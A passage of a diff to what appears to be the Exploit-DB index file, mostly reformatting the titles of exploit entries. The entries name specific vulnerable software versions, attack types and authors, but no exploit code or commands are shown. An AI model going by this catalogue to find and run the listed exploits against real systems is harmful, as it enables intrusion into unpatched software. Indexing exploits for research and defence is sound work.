Vulnerability",2000-10-05,skyper,openbsd,dos,0 20272,platforms/windows/dos/20272.pl,"Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability",1998-08-02,L.Facq,windows,dos,0 20273,platforms/cgi/remote/20273.txt,"Moreover CGI script 0 File Disclosure Vulnerability",2000-10-02,CDI,cgi,remote,0 20274,platforms/multiple/local/20274.pl,"IBM WebSphere 2.0/3.0 ikeyman Weak Encrypted Password Vulnerability",1999-10-24,"Ben Laurie",multiple,local,0 -20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'iplncal.sh' Permissions Vulnerability",2000-10-10,@stake,solaris,local,0 +20275,platforms/solaris/local/20275.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'iplncal.sh' Permissions Vulnerability",2000-10-10,@stake,solaris,local,0 20276,platforms/solaris/local/20276.sh,"Netscape iCal 2.1 Patch2 iPlanet iCal 'csstart' Vulnerability",2000-10-10,@stake,solaris,local,0 20277,platforms/cgi/remote/20277.txt,"Armada Design Master Index 1.0 Path Traversal Vulnerability",2000-07-18,pestilence,cgi,remote,0 20278,platforms/php/webapps/20278.txt,"PHPix 1.0 Directory Traversal Vulnerability",2000-10-07,Synnergy.net,php,webapps,0 @@ -17615,7 +17615,7 @@ id,file,description,date,author,platform,type,port 20302,platforms/windows/remote/20302.pl,"MS IIS 4.0/5.0 and PWS Extended Unicode Directory Traversal Vulnerability (5)",2000-10-17,"Andrea Spabam",windows,remote,0 20303,platforms/cgi/remote/20303.pl,"Oatmeal Studios Mail File 1.10 Arbitrary File Disclosure Vulnerability",2000-10-11,"Dirk Brockhausen",cgi,remote,0 20304,platforms/windows/dos/20304.txt,"Omnicron OmniHTTPD 1.1/2.0 Alpha 1 visiadmin.exe Denial of Service Vulnerability",1999-06-05,"Valentin Perelogin",windows,dos,0 -20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 Malicious File Upload Vulnerability",1999-01-30,Mnemonix,windows,remote,0 +20305,platforms/windows/remote/20305.txt,"Microsoft Site Server 2.0 with IIS 4.0 - File Upload Vulnerability",1999-01-30,Mnemonix,windows,remote,0 20306,platforms/windows/remote/20306.html,"Microsoft Virtual Machine Arbitrary Java Codebase Execution Vulnerability",2000-10-18,"Georgi Guninski",windows,remote,0 20307,platforms/windows/dos/20307.txt,"Hilgraeve HyperTerminal 6.0 Telnet Buffer Overflow Vulnerability",2000-10-18,"Ussr Labs",windows,dos,0 20308,platforms/linux/remote/20308.c,"Samba 1.9.19 Long Password Buffer Overflow Vulnerability",1997-09-25,root@adm.kix-azz.org,linux,remote,0 @@ -17651,7 +17651,7 @@ id,file,description,date,author,platform,type,port 20338,platforms/linux/local/20338.c,"SAMBA 2.0.7 SWAT Symlink Vulnerability (1)",2000-11-01,optyx,linux,local,0 20339,platforms/linux/local/20339.sh,"SAMBA 2.0.7 SWAT Symlink Vulnerability (2)",2000-11-01,optyx,linux,local,0 20340,platforms/unix/remote/20340.c,"SAMBA 2.0.7 SWAT Logging Failure Vulnerability",2000-11-01,dodeca-T,unix,remote,0 -20341,platforms/linux/local/20341.sh,"SAMBA 2.0.7 SWAT Logfile Permissions Vulnerability",2000-11-01,miah,linux,local,0 +20341,platforms/linux/local/20341.sh,"SAMBA 2.0.7 SWAT Logfile Permissions Vulnerability",2000-11-01,miah,linux,local,0 20342,platforms/php/webapps/20342.php,"WespaJuris <= 3.0 Multiple Vulnerabilities",2012-08-08,WhiteCollarGroup,php,webapps,0 20343,platforms/php/webapps/20343.pl,"Joomla En Masse Component 1.2.0.4 SQL Injection",2012-08-08,D4NB4R,php,webapps,0 20344,platforms/php/webapps/20344.php,"AraDown Blind SQL Injection",2012-08-08,G-B,php,webapps,0 @@ -17700,9 +17700,9 @@ id,file,description,date,author,platform,type,port 20387,platforms/cgi/remote/20387.txt,"YaBB 9.11.2000 search.pl Arbitrary Command Execution Vulnerability",2000-11-07,rpc,cgi,remote,0 20388,platforms/linux/dos/20388.txt,"BIND 8.2.2-P5 Denial of Service Vulnerability",2000-11-01,"Fabio Pietrosanti",linux,dos,0 20390,platforms/php/webapps/20390.txt,"Joomla FireBoard Component (com_fireboard) SQL Injection Vulnerability",2012-08-09,Vulnerability-Lab,php,webapps,0 -20391,platforms/php/webapps/20391.php,"Kamads Classifieds V2 Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,php,webapps,0 +20391,platforms/php/webapps/20391.php,"Kamads Classifieds 2.0 - Admin Hash Disclosure",2012-08-09,Mr.tro0oqy,php,webapps,0 20392,platforms/windows/remote/20392.rb,"NetDecision 4.2 TFTP Writable Directory Traversal Execution",2012-08-10,metasploit,windows,remote,0 -20393,platforms/windows/webapps/20393.py,"Cyclope Employee Surveillance Solution v6.0 (6.1.0/6.2.0/6.2.1/6.3.0) SQL Injection",2012-08-09,loneferret,windows,webapps,0 +20393,platforms/windows/webapps/20393.py,"Cyclope Employee Surveillance Solution 6.0/6.1.0/6.2.0/6.2.1/6.3.0 - SQL Injection",2012-08-09,loneferret,windows,webapps,0 20394,platforms/unix/remote/20394.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow Vulnerability (1)",1998-12-26,duke,unix,remote,0 20395,platforms/unix/remote/20395.c,"BNC 2.2.4/2.4.6/2.4.8 IRC Proxy Buffer Overflow Vulnerability (2)",1998-12-26,"jamez and dumped",unix,remote,0 20396,platforms/hp-ux/local/20396.sh,"HP-UX 10.x/11.x Aserver PATH Vulnerability",1998-10-18,Loneguard,hp-ux,local,0 @@ -17727,8 +17727,8 @@ id,file,description,date,author,platform,type,port 20416,platforms/php/webapps/20416.txt,"WordPress Mz-jajak plugin <= 2.1 SQL Injection Vulnerability",2012-08-10,StRoNiX,php,webapps,0 20417,platforms/osx/local/20417.c,"Tunnelblick Local Root Exploit",2012-08-11,zx2c4,osx,local,0 20418,platforms/solaris/local/20418.txt,"Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation",2012-08-11,"Larry Cashdollar",solaris,local,0 -20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds v4.0 CMS Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0 -20421,platforms/php/webapps/20421.txt,"ProQuiz v2.0.2 Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 +20419,platforms/php/webapps/20419.txt,"Flynax General Classifieds 4.0 - CMS Multiple Vulnerabilities",2012-08-11,Vulnerability-Lab,php,webapps,0 +20421,platforms/php/webapps/20421.txt,"ProQuiz 2.0.2 - Multiple Vulnerabilities",2012-08-11,L0n3ly-H34rT,php,webapps,0 20422,platforms/php/webapps/20422.txt,"MobileCartly 1.0 Arbitrary File Write Vulnerability",2012-08-10,"Yakir Wizman",php,webapps,0 20423,platforms/cgi/remote/20423.txt,"NCSA httpd-campas 1.2 sample script Vulnerability",1997-07-15,"Francisco Torres",cgi,remote,0 20424,platforms/windows/remote/20424.txt,"Microsoft Windows Media Player 7.0 .WMS Arbitrary Script Vulnerability",2000-11-22,"Sandro Gauci",windows,remote,0 @@ -17771,25 +17771,25 @@ id,file,description,date,author,platform,type,port 20461,platforms/windows/remote/20461.txt,"Serv-U 2.4/2.5 FTP Directory Traversal Vulnerability",2000-12-05,Zoa_Chien,windows,remote,0 20462,platforms/unix/remote/20462.txt,"Hylafax 4.0 pl2 Faxsurvey Remote Command Execution Vulnerability",1998-08-04,Tom,unix,remote,0 20463,platforms/cgi/remote/20463.txt,"WEBgais 1.0 Remote Command Execution Vulnerability",1997-07-10,"Razvan Dragomirescu",cgi,remote,0 -20464,platforms/windows/dos/20464.py,"Spytech NetVizor v6.1 (services.exe) DoS",2012-08-12,loneferret,windows,dos,0 +20464,platforms/windows/dos/20464.py,"Spytech NetVizor 6.1 - (services.exe) DoS",2012-08-12,loneferret,windows,dos,0 20465,platforms/cgi/remote/20465.sh,"Squid Web Proxy 2.2 cachemgr.cgi Unauthorized Connection Vulnerability",1999-07-23,fsaa,cgi,remote,0 20466,platforms/multiple/remote/20466.txt,"Apache 1.3 Web Server with Php 3 File Disclosure Vulnerability",2000-12-06,"china nsl",multiple,remote,0 20467,platforms/multiple/remote/20467.txt,"Inktomi Search Software 3.0 Source Disclosure Vulnerability",2000-12-05,"china nsl",multiple,remote,0 20468,platforms/multiple/remote/20468.txt,"Inktomi Search Software 3.0 Information Disclosure Vulnerability",2000-12-05,"china nsl",multiple,remote,0 20469,platforms/unix/remote/20469.txt,"Endymion MailMan 3.0..x Remote Arbitrary Command Execution Vulnerability",2000-12-06,"Secure Reality Advisories",unix,remote,0 20470,platforms/windows/dos/20470.txt,"IBM DB2 Universal Database for Windows NT 6.1/7.1 SQL DoS Vulnerability",2000-12-05,benjurry,windows,dos,0 -20472,platforms/multiple/remote/20472.txt,"IBM DB2 Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability",2000-12-05,benjurry,multiple,remote,0 +20472,platforms/multiple/remote/20472.txt,"IBM DB2 Universal Database for Linux 6.1/Windows NT 6.1 Known Default Password Vulnerability",2000-12-05,benjurry,multiple,remote,0 20473,platforms/hardware/dos/20473.pl,"Cisco Catalyst 4000 4.x/5.x,Catalyst 5000 4.5/5.x,Catalyst 6000 5.x Memory Leak DoS",2000-12-06,blackangels,hardware,dos,0 -20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker v2.5.4 Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0 +20474,platforms/php/webapps/20474.txt,"WordPress RSVPMaker 2.5.4 - Persistent XSS",2012-08-13,"Chris Kellum",php,webapps,0 20476,platforms/php/webapps/20476.txt,"Hotel Booking Portal v0.1 Multiple Vulnerabilities",2012-08-13,"Yakir Wizman",php,webapps,0 20477,platforms/windows/webapps/20477.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway CSRF Vulnerability",2012-08-13,"Nir Valtman",windows,webapps,0 20478,platforms/windows/webapps/20478.txt,"IBM WebSphere MQ File Transfer Edition Web Gateway Insufficient Access Control",2012-08-13,"Nir Valtman",windows,webapps,0 -20479,platforms/linux/dos/20479.pl,"Pure-FTPd v1.0.21 (centos 6.2, ubuntu 8.04) Crash PoC (Null Pointer Dereference)",2012-08-13,Kingcope,linux,dos,0 +20479,platforms/linux/dos/20479.pl,"Pure-FTPd 1.0.21 (CentOS 6.2 & Ubuntu 8.04) - Crash PoC (Null Pointer Dereference)",2012-08-13,Kingcope,linux,dos,0 20481,platforms/windows/remote/20481.txt,"Microsoft IIS 2.0/3.0 Appended Dot Script Source Disclosure Vulnerability",1997-02-20,"Mark Joseph Edwards",windows,remote,0 20482,platforms/novell/remote/20482.txt,"Novell Netware Web Server 3.x files.pl Vulnerability",1998-12-01,Anonymous,novell,remote,0 20483,platforms/cgi/remote/20483.txt,"WEBgais 1.0 websendmail Remote Command Execution Vulnerability",1997-07-04,"Razvan Dragomirescu",cgi,remote,0 20484,platforms/windows/dos/20484.txt,"OReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow Vulnerability",1997-01-06,"Solar Designer",windows,dos,0 -20485,platforms/osx/local/20485.sh,"OS X Local Root Exploit for Viscosity OpenVPN Client",2012-08-13,zx2c4,osx,local,0 +20485,platforms/osx/local/20485.sh,"OS X Viscosity OpenVPN Client - Local Root Exploit",2012-08-13,zx2c4,osx,local,0 20486,platforms/unix/remote/20486.html,"Matt Wright FormMail 1.x Cross-Site Request Forgery Vulnerability",1997-01-01,Anonymous,unix,remote,0 20487,platforms/hardware/dos/20487.pl,"Watchguard SOHO 2.2 Denial of Service Vulnerability",2000-12-08,"Filip Maertens",hardware,dos,0 20488,platforms/windows/remote/20488.txt,"MetaProducts Offline Explorer 1.x File System Disclosure Vulnerability",2000-12-07,Dodger,windows,remote,0 @@ -17802,8 +17802,8 @@ id,file,description,date,author,platform,type,port 20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 Buffer Overflow Vulnerabilities (1)",2000-12-11,CyRaX,unix,remote,0 20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 Buffer Overflow Vulnerabilities (2)",2000-12-07,diman,linux,remote,0 20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 Arbitrary Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0 -20500,platforms/php/remote/20500.rb,"TestLink v1.9.3 Arbitrary File Upload Vulnerability",2012-08-15,metasploit,php,remote,0 -20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution v6 SQL Injection",2012-08-15,metasploit,windows,remote,7879 +20500,platforms/php/remote/20500.rb,"TestLink 1.9.3 - Arbitrary File Upload Vulnerability",2012-08-15,metasploit,php,remote,0 +20501,platforms/windows/remote/20501.rb,"Cyclope Employee Surveillance Solution 6.0 - SQL Injection",2012-08-15,metasploit,windows,remote,7879 20502,platforms/java/remote/20502.rb,"Novell ZENworks Asset Management Remote Execution",2012-08-15,metasploit,java,remote,8080 20503,platforms/cgi/remote/20503.html,"Leif M. Wright simplestmail.cgi 1.0 Remote Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0 20504,platforms/cgi/remote/20504.html,"Leif M. Wright ad.cgi 1.0 Unchecked Input Vulnerability",2000-12-11,rpc,cgi,remote,0 @@ -17812,7 +17812,7 @@ id,file,description,date,author,platform,type,port 20507,platforms/multiple/remote/20507.txt,"Alex Heiphetz Group EZShopper 2.0/3.0 Directory Traversal Vulnerability",2000-12-13,Nsfocus,multiple,remote,0 20508,platforms/windows/dos/20508.txt,"Microsoft NT 4.0 RAS/PPTP Malformed Control Packet Denial of Service Attack",1999-04-27,"Simon Helson",windows,dos,0 20509,platforms/hardware/dos/20509.pl,"Cisco Catalyst 4000/5000/6000 6.1 SSH Protocol Mismatch Denial of Service",2000-12-13,blackangels,hardware,dos,0 -20510,platforms/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 'aim://' Buffer Overflow Vulnerability",2000-12-12,"Joe Testa",windows,remote,0 +20510,platforms/windows/remote/20510.txt,"AOL Instant Messenger 3.5.1856/4.0/4.1.2010/4.2.1193 'aim://' Buffer Overflow Vulnerability",2000-12-12,"Joe Testa",windows,remote,0 20511,platforms/windows/remote/20511.txt,"AOL Instant Messenger 4.0/4.1.2010/4.2.1193 BuddyIcon Buffer Overflow Vulnerability",2000-12-12,@stake,windows,remote,0 20512,platforms/unix/remote/20512.txt,"BSD ftpd 0.3.2 Single Byte Buffer Overflow Vulnerability",2000-12-18,Scrippie,unix,remote,0 20513,platforms/multiple/remote/20513.txt,"iCat Electronic Commerce Suite 3.0 File Disclosure Vulnerability",1997-11-08,"Mikael Johansson",multiple,remote,0 @@ -17842,15 +17842,15 @@ id,file,description,date,author,platform,type,port 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0 20539,platforms/php/webapps/20539.txt,"MobileCartly 1.0 Remote File Upload Vulnerability",2012-08-15,ICheer_No0M,php,webapps,0 -20541,platforms/php/webapps/20541.txt,"MaxForum v1.0.0 Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0 +20541,platforms/php/webapps/20541.txt,"MaxForum 1.0.0 - Local File Inclusion",2012-08-15,ahwak2000,php,webapps,0 20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,metasploit,windows,local,0 20543,platforms/windows/local/20543.rb,"Windows Service Trusted Path Privilege Escalation",2012-08-15,metasploit,windows,local,0 -20544,platforms/php/webapps/20544.txt,"xt:Commerce <= v3.04 SP2.1 Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 -20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution v6.0 Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 +20544,platforms/php/webapps/20544.txt,"xt:Commerce <= 3.04 SP2.1 - Time Based Blind SQL Injection",2012-08-15,stoffline.com,php,webapps,0 +20545,platforms/windows/webapps/20545.txt,"Cyclope Employee Surveillance Solution 6.0 - Multiple Vulnerabilities",2012-08-15,loneferret,windows,webapps,0 20546,platforms/php/webapps/20546.txt,"sphpforum 0.4 Multiple Vulnerabilities",2012-08-15,loneferret,php,webapps,0 20547,platforms/windows/remote/20547.txt,"IE Time Element Memory Corruption Exploit (MS11-050)",2012-08-16,Ciph3r,windows,remote,0 -20549,platforms/php/webapps/20549.py,"Roundcube Webmail Version 0.8.0 Stored XSS",2012-08-16,"Shai rod",php,webapps,0 -20550,platforms/php/webapps/20550.txt,"ProQuiz v2.0.2 CSRF Vulnerability",2012-08-16,DaOne,php,webapps,0 +20549,platforms/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Stored XSS",2012-08-16,"Shai rod",php,webapps,0 +20550,platforms/php/webapps/20550.txt,"ProQuiz 2.0.2 - CSRF Vulnerability",2012-08-16,DaOne,php,webapps,0 20551,platforms/linux/remote/20551.pl,"E-Mail Security Virtual Appliance (ESVA) Remote Execution",2012-08-16,iJoo,linux,remote,0 20552,platforms/windows/dos/20552.html,"Internet Explorer 4.0,Outlook 2000/5.5 MSHTML.DLL Crash Vulnerability",2001-01-15,"Thor Larholm",windows,dos,0 20553,platforms/windows/remote/20553.html,"Microsoft Windows Media Player 7.0 .WMZ Arbitrary Java Applet Vulnerability",2001-01-15,"Georgi Guninski",windows,remote,0 @@ -17872,9 +17872,9 @@ id,file,description,date,author,platform,type,port 20569,platforms/linux/remote/20569.c,"mICQ 0.4.6 Remote Buffer Overflow Vulnerability",2001-01-17,"tHE rECIdjVO",linux,remote,0 20570,platforms/cgi/remote/20570.txt,"Sambar Server 4.1 beta Admin Access Vulnerability",1998-06-10,"Michiel de Weerd",cgi,remote,0 20571,platforms/windows/remote/20571.txt,"Microsoft Outlook 2000 0/98 0/Express 5.5 Concealed Attachment Vulnerability",2001-01-17,http-equiv,windows,remote,0 -20573,platforms/php/webapps/20573.html,"Jaow CMS v2.3 CSRF Vulnerability",2012-08-17,DaOne,php,webapps,0 -20574,platforms/php/webapps/20574.txt,"Social Engine v4.2.5 Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,php,webapps,0 -20575,platforms/windows/webapps/20575.txt,"ManageEngine OpStor v7.4 Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,windows,webapps,0 +20573,platforms/php/webapps/20573.html,"Jaow CMS 2.3 - CSRF Vulnerability",2012-08-17,DaOne,php,webapps,0 +20574,platforms/php/webapps/20574.txt,"Social Engine 4.2.5 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,php,webapps,0 +20575,platforms/windows/webapps/20575.txt,"ManageEngine OpStor 7.4 - Multiple Vulnerabilities",2012-08-17,Vulnerability-Lab,windows,webapps,0 20576,platforms/php/webapps/20576.txt,"Inferno vBShout <= 2.5.2 SQL Injection",2012-08-17,Luit,php,webapps,0 20578,platforms/php/webapps/20578.pl,"Hastymail2 Webmail 1.1 RC2 Stored XSS",2012-08-17,"Shai rod",php,webapps,0 20579,platforms/php/webapps/20579.py,"T-dah Webmail Multiple Stored XSS",2012-08-17,"Shai rod",php,webapps,0 @@ -17893,10 +17893,10 @@ id,file,description,date,author,platform,type,port 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading Vulnerability",2000-01-22,"Georgi Guninski",jsp,remote,0 20593,platforms/freebsd/remote/20593.txt,"FreeBSD 3.x/4.x ipfw Filtering Evasion Vulnerability",2001-01-23,"Aragon Gouveia",freebsd,remote,0 20594,platforms/unix/remote/20594.txt,"Wu-Ftpd 2.4.2/2.5/2.6 Debug Mode Client Hostname Format String Vulnerability",2001-01-23,"Wu-ftpd team",unix,remote,0 -20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability",1999-09-25,Anonymous,multiple,remote,0 +20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5,Apache httpd 0.8.11/0.8.14 ScriptAlias Source Retrieval Vulnerability",1999-09-25,Anonymous,multiple,remote,0 20596,platforms/windows/dos/20596.c,"Microsoft Windows NT 4.0 Networking Mutex DoS Vulnerability",2001-01-24,"Arne Vidstrom",windows,dos,0 20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 lists Command Execution Vulnerability",1994-06-06,"Razvan Dragomirescu",linux,remote,0 -20598,platforms/php/webapps/20598.txt,"Jaow CMS v2.3 Blind SQLi Vulnerability",2012-08-17,loneferret,php,webapps,0 +20598,platforms/php/webapps/20598.txt,"Jaow CMS 2.3 - Blind SQLi Vulnerability",2012-08-17,loneferret,php,webapps,0 20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT Remote root Vulnerability",1994-02-24,CIAC,unix,remote,0 20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 SMTP Buffer Overflow Vulnerability",1999-02-13,_mcp_,windows,remote,0 20601,platforms/multiple/remote/20601.txt,"iWeb Hyperseek 2000 Directory Traversal Vulnerability",2001-01-28,"MC GaN",multiple,remote,0 @@ -17941,7 +17941,7 @@ id,file,description,date,author,platform,type,port 20640,platforms/windows/remote/20640.txt,"Working Resources BadBlue 1.2.7 Path Disclosure Vulnerability",2001-02-20,"SNS Research",windows,remote,0 20641,platforms/windows/dos/20641.txt,"Working Resources BadBlue 1.2.7 DoS Vulnerability",2001-02-20,"SNS Research",windows,dos,0 20642,platforms/cgi/remote/20642.pl,"Adcycle 0.77/0.78 AdLibrary.pm Session Access Vulnerability",2001-02-19,"Neil K",cgi,remote,0 -20643,platforms/windows/webapps/20643.txt,"ManageEngine OpUtils v6 Stored XSS",2012-08-18,loneferret,windows,webapps,7080 +20643,platforms/windows/webapps/20643.txt,"ManageEngine OpUtils 6.0 - Stored XSS",2012-08-18,loneferret,windows,webapps,7080 20644,platforms/hardware/dos/20644.c,"Marconi ASX-1000 Administration Denial Of Service Vulnerability",2001-02-19,"J.K. Garvey",hardware,dos,0 20645,platforms/linux/local/20645.c,"Elm 2.5.3 Alternative-Folder Buffer Overflow Vulnerability",2001-02-13,_kiss_,linux,local,0 20646,platforms/unix/remote/20646.c,"LICQ 0.85/1.0.1/1.0.2 Remote Buffer Overflow Vulnerability",2000-12-26,"Stan Bubrouski",unix,remote,0 @@ -17996,12 +17996,12 @@ id,file,description,date,author,platform,type,port 20697,platforms/unix/local/20697.c,"DG/UX 4.20 lpsched Long Error Message Buffer Overflow Vulnerability",2001-03-19,"Luciano Rocha",unix,local,0 20702,platforms/windows/remote/20702.rb,"Sysax Multi Server 5.64 Create Folder Buffer Overflow",2012-08-21,metasploit,windows,remote,0 20703,platforms/php/webapps/20703.txt,"XODA Document Management System v0.4.5 XSS & Arbitrary File Upload",2012-08-21,"Shai rod",php,webapps,0 -20704,platforms/php/webapps/20704.txt,"Clipbucket v2.5 Directory Traversal",2012-08-21,loneferret,php,webapps,0 +20704,platforms/php/webapps/20704.txt,"Clipbucket 2.5 - Directory Traversal",2012-08-21,loneferret,php,webapps,0 20705,platforms/multiple/dos/20705.py,"SAP Netweaver Dispatcher 7.0 EHP1/2 Multiple Vulnerabilities",2012-08-21,"Core Security",multiple,dos,0 20706,platforms/linux/webapps/20706.rb,"Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF)",2012-08-21,Kc57,linux,webapps,0 20707,platforms/linux/webapps/20707.py,"Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change",2012-08-21,Kc57,linux,webapps,0 -20708,platforms/php/webapps/20708.txt,"Clipbucket v2.5 Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0 -20709,platforms/php/webapps/20709.html,"OpenDocMan v1.2.6.1 Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 +20708,platforms/php/webapps/20708.txt,"Clipbucket 2.5 - Blind SQLi Vulnerability",2012-08-21,loneferret,php,webapps,0 +20709,platforms/php/webapps/20709.html,"OpenDocMan 1.2.6.1 - Password Change CSRF",2012-08-22,"Shai rod",php,webapps,0 20710,platforms/php/webapps/20710.html,"VamCart v0.9 CSRF Vulnerability",2012-08-22,DaOne,php,webapps,0 20712,platforms/cgi/webapps/20712.rb,"E-Mail Security Virtual Appliance learn-msg.cgi Command Injection",2012-08-22,metasploit,cgi,webapps,0 20713,platforms/php/webapps/20713.rb,"XODA 0.4.5 Arbitrary PHP File Upload Vulnerability",2012-08-22,metasploit,php,webapps,0 @@ -18047,7 +18047,7 @@ id,file,description,date,author,platform,type,port 20753,platforms/cgi/remote/20753.txt,"IBM Websphere/Net.Commerce 3 CGI-BIN Macro Denial of Service Vulnerability",2001-04-13,"ET LoWNOISE",cgi,remote,0 20758,platforms/windows/remote/20758.c,"Vice City Multiplayer Server 0.3z R2 Remote Code Execution",2012-08-23,Sasuke78200,windows,remote,0 20759,platforms/php/webapps/20759.txt,"LetoDMS 3.3.6 Multiple Vulnerabilities",2012-08-23,"Shai rod",php,webapps,0 -20760,platforms/php/webapps/20760.txt,"op5 Monitoring v5.4.2 (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 +20760,platforms/php/webapps/20760.txt,"op5 Monitoring 5.4.2 - (VM Applicance) Multiple Vulnerabilities",2012-08-23,loneferret,php,webapps,0 20761,platforms/php/webapps/20761.txt,"Ad Manager Pro v. 4 LFI",2012-08-23,CorryL,php,webapps,0 20762,platforms/php/webapps/20762.php,"WebPA <= 1.1.0.1 Multiple Vulnerabilities",2012-08-24,dun,php,webapps,0 20763,platforms/windows/dos/20763.c,"Microsoft ISA Server 2000 Web Proxy DoS Vulnerability",2001-04-16,"SecureXpert Labs",windows,dos,0 @@ -18093,10 +18093,10 @@ id,file,description,date,author,platform,type,port 20804,platforms/irix/local/20804.c,"IRIX 5.3/6.x 'netprint' Arbitrary Shared Library Usage Vulnerability",2001-04-26,V9,irix,local,0 20805,platforms/irix/remote/20805.c,"SGI IRIX 3/4/5/6,OpenLinux 1.0/1.1 routed traceon Vulnerability",1998-10-21,Rootshell,irix,remote,0 20806,platforms/hardware/remote/20806.txt,"Tektronix Phaser 740/750/850/930 Network Printer Administration Interface Vulnerability",2001-04-25,Ltlw0lf,hardware,remote,0 -20807,platforms/multiple/remote/20807.txt,"DataWizard WebXQ 2.1.204 Directory Traversal Vulnerability",2001-04-27,joetesta,multiple,remote,0 +20807,platforms/multiple/remote/20807.txt,"DataWizard WebXQ 2.1.204 Directory Traversal Vulnerability",2001-04-27,joetesta,multiple,remote,0 20808,platforms/cgi/remote/20808.txt,"PerlCal 2.x Directory Traversal Vulnerability",2001-04-27,ThePike,cgi,remote,0 20809,platforms/cgi/remote/20809.html,"Excite for Web Servers 1.1 Administrative Password Vulnerability",1998-11-30,"Michael Gerdts",cgi,remote,0 -20810,platforms/multiple/remote/20810.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,remote,0 +20810,platforms/multiple/remote/20810.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (1)",1997-11-20,m3lt,multiple,remote,0 20811,platforms/multiple/remote/20811.cpp,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (2)",1997-11-20,"Konrad Malewski",multiple,remote,0 20812,platforms/windows/remote/20812.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (3)",1997-11-20,m3lt,windows,remote,0 20813,platforms/multiple/remote/20813.c,"FreeBSD 2.x,HP-UX 9/10/11,kernel 2.0.3,Windows NT 4.0/Server 2003,NetBSD 1 loopback (land.c) DoS (4)",1997-11-20,MondoMan,multiple,remote,0 @@ -18152,11 +18152,11 @@ id,file,description,date,author,platform,type,port 20865,platforms/java/remote/20865.rb,"Java 7 Applet Remote Code Execution",2012-08-27,metasploit,java,remote,0 20866,platforms/php/webapps/20866.txt,"Aoop CMS 0.3.6 Multiple Vulnerabilities",2012-08-27,"Julien Ahrens",php,webapps,0 20867,platforms/linux/local/20867.txt,"ARCservIT 6.61/6.63 Client asagent.tmp Arbitrary File Overwrite Vulnerability",2001-05-18,"Jonas Eriksson",linux,local,0 -20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client inetd.tmp Arbitrary File Overwrite Vulnerability",2001-05-18,"Jonas Eriksson",linux,local,0 +20868,platforms/linux/local/20868.txt,"ARCservIT 6.61/6.63 Client inetd.tmp Arbitrary File Overwrite Vulnerability",2001-05-18,"Jonas Eriksson",linux,local,0 20869,platforms/multiple/remote/20869.html,"eSafe Gateway 2.1 Script-filtering Bypass Vulnerability",2001-05-20,"eDvice Security Services",multiple,remote,0 -20870,platforms/windows/dos/20870.pl,"Express Burn Plus v4.58 EBP Project File Handling Buffer Overflow PoC",2012-08-28,LiquidWorm,windows,dos,0 -20871,platforms/php/webapps/20871.txt,"CommPort 1.01 <= Multiple Vulnerabilities",2012-08-28,"Jean Pascal Pereira",php,webapps,0 -20872,platforms/php/webapps/20872.txt,"mieric addressBook 1.0 <= SQL Injection Vulnerability",2012-08-28,"Jean Pascal Pereira",php,webapps,0 +20870,platforms/windows/dos/20870.pl,"Express Burn Plus 4.58 - EBP Project File Handling Buffer Overflow 